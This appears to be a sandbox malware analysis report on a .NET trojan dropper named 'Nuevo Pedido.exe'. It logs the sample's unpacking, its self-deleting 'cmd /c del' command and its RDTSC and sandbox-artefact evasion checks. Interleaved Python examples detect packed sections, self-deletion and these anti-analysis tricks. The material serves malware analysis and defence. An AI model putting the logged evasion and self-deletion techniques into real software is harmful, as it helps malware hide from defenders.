            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.309549800.0000000001C3F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe | Binary or memory string: OriginalFilenameMethodImplAttribut.exe. vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Nuevo Pedido.exe | Virustotal: Detection: 32%
            Source: Nuevo Pedido.exe | ReversingLabs: Detection: 33%
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | File read: C:\Users\user\Desktop\Nuevo Pedido.exe:Zone.Identifier
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo Pedido.exe.log
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@11/6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_01
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addbook.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addbook.baml
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addcustomer.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addcustomer.baml
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addbook.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addbook.baml
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addcustomer.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addcustomer.baml
            Source: Nuevo Pedido.exeString found in binary or memory: a/MethodImplAttribut;component/views/addbook.xamlw/MethodImplAttribut;component/views/borrowfrombookview.xamlm/MethodImplAttribut;component/views/borrowingview.xamlg/MethodImplAttribut;component/views/changebook.xamlo/MethodImplAttribut;component/views/changecustomer.xamlk/MethodImplAttribut;component/views/customerview.xamlo/MethodImplAttribut;component/views/deletecustomer.xamle/MethodImplAttribut;component/views/errorview.xamli/MethodImplAttribut;component/views/smallextras.xamli/MethodImplAttribut;component/views/addcustomer.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Nuevo Pedido.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Nuevo Pedido.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: Nuevo Pedido.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A892F5 push ds; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A89361 push ds; retf
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A89347 push ds; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_056356E0 push esp; iretd
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B822 push eax; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B82B push eax; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B88C push eax; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004153E6 push ss; iretd
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041541E push ss; iretd
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B7D5 push eax; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE92F5 push ds; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE9347 push ds; ret
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE9361 push ds; retf
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A0D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047CD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B822 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B82B push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B88C push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006153E6 push ss; iretd
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061541E push ss; iretd
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B7D5 push eax; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.85660170333
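The two findings in this section point the same way: the Assembly.Load(byte[]) call in Biblan/Views/MainWindow.cs lets the first stage load a second assembly straight from a byte array, and a .text section with an entropy of 7.8566 bits per byte is close to the 8.0 of uniformly random data, which is what an encrypted or compressed payload embedded in a code section looks like. Compiled .NET IL normally sits well below that. A quick static triage check, added here as an example for this page (it is not part of the Joe Sandbox report and not the sample's code), walks the PE section table with the standard library and lists sections whose Shannon entropy reaches a cut-off. The 7.0 threshold and the minimal fake PE the block builds so it can run offline are assumptions of the example.

```python
import hashlib
import math
import struct
from collections import Counter
from typing import Dict, List, Tuple

# Assumption for this example: sections at or above this many bits per byte are
# treated as packed/encrypted. The report's .text scored 7.8566.
PACKED_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant run, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    ent = -sum((c / n) * math.log2(c / n) for c in Counter(data).values())
    return 0.0 if ent == 0 else ent


def pe_sections(pe: bytes) -> List[Tuple[str, bytes]]:
    """Walk the PE section table with the standard library only; returns (name, raw bytes)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                    # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + opt_size                           # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def section_entropies(pe: bytes) -> Dict[str, float]:
    return {name: round(shannon_entropy(raw), 4) for name, raw in pe_sections(pe)}


def likely_packed(pe: bytes, threshold: float = PACKED_THRESHOLD) -> List[str]:
    """Names of sections at or above the threshold; a code section here is the packer tell."""
    return [name for name, ent in section_entropies(pe).items() if ent >= threshold]


def build_fake_pe(sections: List[Tuple[bytes, bytes]]) -> bytes:
    """Constructed minimal PE (no optional header, not loadable) so the example runs offline."""
    e_lfanew = 0x40
    headers_len = e_lfanew + 4 + 20 + 40 * len(sections)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    out = bytearray(dos + b"PE\0\0" + coff)
    body = b""
    raw_ptr = headers_len
    for name, data in sections:
        out += name.ljust(8, b"\0")
        out += struct.pack("<IIII", len(data), raw_ptr, len(data), raw_ptr)  # VSize, VA, RawSize, RawPtr
        out += b"\0" * 16                                                    # relocs, linenums, characteristics
        body += data
        raw_ptr += len(data)
    return bytes(out) + body


def _pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler standing in for an encrypted payload."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(counter.to_bytes(4, "little")).digest()
        counter += 1
    return out[:n]


# Constructed sample: a near-uniform .text, as a packed loader would have, next to a flat .rdata.
SAMPLE_PE = build_fake_pe([(b".text", _pseudo_random(4096)), (b".rdata", b"\0" * 512)])

if __name__ == "__main__":
    for name, ent in section_entropies(SAMPLE_PE).items():
        print(f"{name:<8} entropy={ent:.4f}")
    print("likely packed:", likely_packed(SAMPLE_PE))
```

Entropy alone does not distinguish compression from encryption, and a legitimately large resource section can score high too; the signal worth acting on is a high-entropy section that is also marked executable, as the report's IMAGE_SCN_MEM_EXECUTE .text is here.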

            Hooking and other Techniques for Hiding and Protection:

            Self deletion via cmd delete
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
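The two cmd.exe launches above close the chain the report traces: the dropper starts a second copy of itself, the payload ends up in a cscript.exe that explorer.exe was made to launch (the report flags process hollowing and thread injection), and that cscript.exe deletes the original Nuevo Pedido.exe from the Desktop. Process-creation telemetry catches this reliably for two reasons that hold independently: the path named by `del` is the image of a process seen earlier in the same trace, and the parent is a script host with no script on its command line. The following detection is an added example written for this page, not part of the Joe Sandbox report; the event records are constructed to mirror the report's process tree, and every PID other than 6320 is invented.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events modelled on the report's process tree.
# Only PID 6320 appears in the report; every other PID here is invented.
EVENTS: List[Dict] = [
    {"pid": 2500, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 6320, "ppid": 2500, "image": r"C:\Users\user\Desktop\Nuevo Pedido.exe",
     "cmdline": r'"C:\Users\user\Desktop\Nuevo Pedido.exe"'},
    {"pid": 6360, "ppid": 6320, "image": r"C:\Users\user\Desktop\Nuevo Pedido.exe",
     "cmdline": r"C:\Users\user\Desktop\Nuevo Pedido.exe"},
    {"pid": 4100, "ppid": 2500, "image": r"C:\Windows\SysWOW64\cscript.exe",
     "cmdline": r"C:\Windows\SysWOW64\cscript.exe"},
    {"pid": 6660, "ppid": 4100, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\Desktop\Nuevo Pedido.exe"'},
    # Benign noise: a build script cleaning up a log file.
    {"pid": 7000, "ppid": 2500, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c del C:\Users\user\AppData\Local\Temp\build.log"},
]

# `del` with optional switches, then a quoted or a bare path.
DEL_RE = re.compile(r'(?i)\bdel\b\s+(?:/[a-z]\s+)*(?:"([^"]+)"|(\S+))')

# Assumption: script hosts that have no business parenting a cmd.exe that deletes an executable.
SCRIPT_HOSTS = ("\\cscript.exe", "\\wscript.exe", "\\mshta.exe")


def del_target(cmdline: str) -> Optional[str]:
    """Path named by a `del` in the command line, lower-cased for comparison, or None."""
    m = DEL_RE.search(cmdline)
    if not m:
        return None
    return (m.group(1) or m.group(2)).strip().lower()


def find_self_deletions(events: List[Dict]) -> List[Dict]:
    """Flag cmd.exe deletions whose target was an executed image, or whose parent is a script host."""
    by_pid = {e["pid"]: e for e in events}
    executed = {e["image"].lower() for e in events}
    hits = []
    for e in events:
        if not e["image"].lower().endswith("\\cmd.exe"):
            continue
        target = del_target(e["cmdline"])
        if target is None:
            continue
        parent = by_pid.get(e["ppid"])
        parent_image = parent["image"] if parent else "<unknown>"
        if target in executed:
            reason = "deleted path is the image of a process seen earlier in the trace"
        elif target.endswith(".exe") and parent_image.lower().endswith(SCRIPT_HOSTS):
            reason = "script host deleting an executable"
        else:
            continue
        hits.append({"pid": e["pid"], "parent": parent_image, "deleted": target, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in find_self_deletions(EVENTS):
        print(f"pid {hit['pid']} (parent {hit['parent']}) deleted {hit['deleted']}: {hit['reason']}")
```

In a live pipeline the `executed` set should be built from the whole session's process-creation events (Sysmon Event ID 1 or Security 4688 with command-line auditing), not only from the current batch, since the `del` typically arrives minutes after the dropper ran. The deletion also explains why the dropper is gone when responders reach the host: recover it from the sandbox or from the sample hash, not from the Desktop.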
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara matchFile source: 0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nuevo Pedido.exe.2e6b054.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nuevo Pedido.exe PID: 6320, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000608604 second address: 000000000060860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000060899E second address: 00000000006089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
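The sequence the interceptor logs, `rdtsc; xor ecx, ecx; add ecx, eax; rdtsc`, is the classic timing check: two timestamp-counter reads a couple of instructions apart, so that the delta is a few dozen cycles on bare metal but balloons when a hypervisor traps RDTSC or a debugger single-steps. The same code appears at 0x408604 in the second Nuevo Pedido.exe and at 0x608604 in cscript.exe, an offset shift of exactly 0x200000, which is the same payload mapped at two bases. The scanner below is an added example for this page (not part of the Joe Sandbox report and not the sample's code): it finds paired rdtsc opcodes within a short window, the `mov eax/ecx, dword ptr fs:[30h]` PEB reads listed further down in this section, and the sandbox artefact strings (SbieDll.dll, wine_get_unix_file_name, the VMware Tools names) in both ASCII and the UTF-16LE that .NET uses for its strings. The sample blob it scans is constructed; the 16-byte pairing window is an assumption.

```python
from typing import Dict, List, Tuple

RDTSC = b"\x0f\x31"                                 # rdtsc
PEB_READ_EAX = bytes.fromhex("64a130000000")        # mov eax, dword ptr fs:[30h]
PEB_READ_ECX = bytes.fromhex("648b0d30000000")      # mov ecx, dword ptr fs:[30h]

# Sandbox/VM artefacts the report found in the sample's memory. The first stage is
# .NET, whose strings are UTF-16LE, so both encodings are searched.
ANTI_ANALYSIS_STRINGS = ["SbieDll.dll", "wine_get_unix_file_name", "VMware Tools", "VMware SVGA II"]

# Constructed 32-bit code fragment (not copied from the sample) reproducing the
# report's sequence: rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
RDTSC_PAIR_FRAGMENT = bytes.fromhex("0f31" "31c9" "01c1" "0f31")

# Constructed memory blob: the fragment at offset 4, a PEB read at offset 20, a UTF-16 SbieDll.dll.
SAMPLE_BLOB = (b"\x90" * 4 + RDTSC_PAIR_FRAGMENT + b"\x90" * 8 + PEB_READ_EAX
               + b"\x90" * 4 + "SbieDll.dll".encode("utf-16-le"))


def find_all(blob: bytes, pattern: bytes) -> List[int]:
    """Every offset at which pattern occurs (overlaps included)."""
    offsets, start = [], 0
    while True:
        i = blob.find(pattern, start)
        if i < 0:
            return offsets
        offsets.append(i)
        start = i + 1


def rdtsc_pairs(blob: bytes, max_gap: int = 16) -> List[Tuple[int, int]]:
    """Offsets of two rdtsc at most max_gap bytes apart: the 'time a short stretch' check."""
    offs = find_all(blob, RDTSC)
    return [(a, b) for a, b in zip(offs, offs[1:]) if b - a <= max_gap]


def peb_reads(blob: bytes) -> List[int]:
    """Offsets of fs:[30h] loads (PEB base, the first step of BeingDebugged/NtGlobalFlag checks)."""
    return sorted(find_all(blob, PEB_READ_EAX) + find_all(blob, PEB_READ_ECX))


def string_indicators(blob: bytes) -> List[str]:
    lowered = blob.lower()  # bytes.lower() only touches ASCII, which is all these strings need
    found = []
    for s in ANTI_ANALYSIS_STRINGS:
        for enc in ("ascii", "utf-16-le"):
            if s.lower().encode(enc) in lowered:
                found.append(f"{s} ({enc})")
                break
    return found


def scan(blob: bytes, base: int = 0) -> Dict[str, list]:
    """Triage a code or memory dump; `base` rebases offsets to the dump's load address."""
    return {
        "rdtsc_pairs": [(base + a, base + b) for a, b in rdtsc_pairs(blob)],
        "peb_reads": [base + o for o in peb_reads(blob)],
        "strings": string_indicators(blob),
    }


if __name__ == "__main__":
    result = scan(SAMPLE_BLOB, base=0x408600)
    for a, b in result["rdtsc_pairs"]:
        print(f"rdtsc pair: {a:#010x} -> {b:#010x}")
    print("PEB reads:", [f"{o:#010x}" for o in result["peb_reads"]])
    print("strings:", result["strings"])
```

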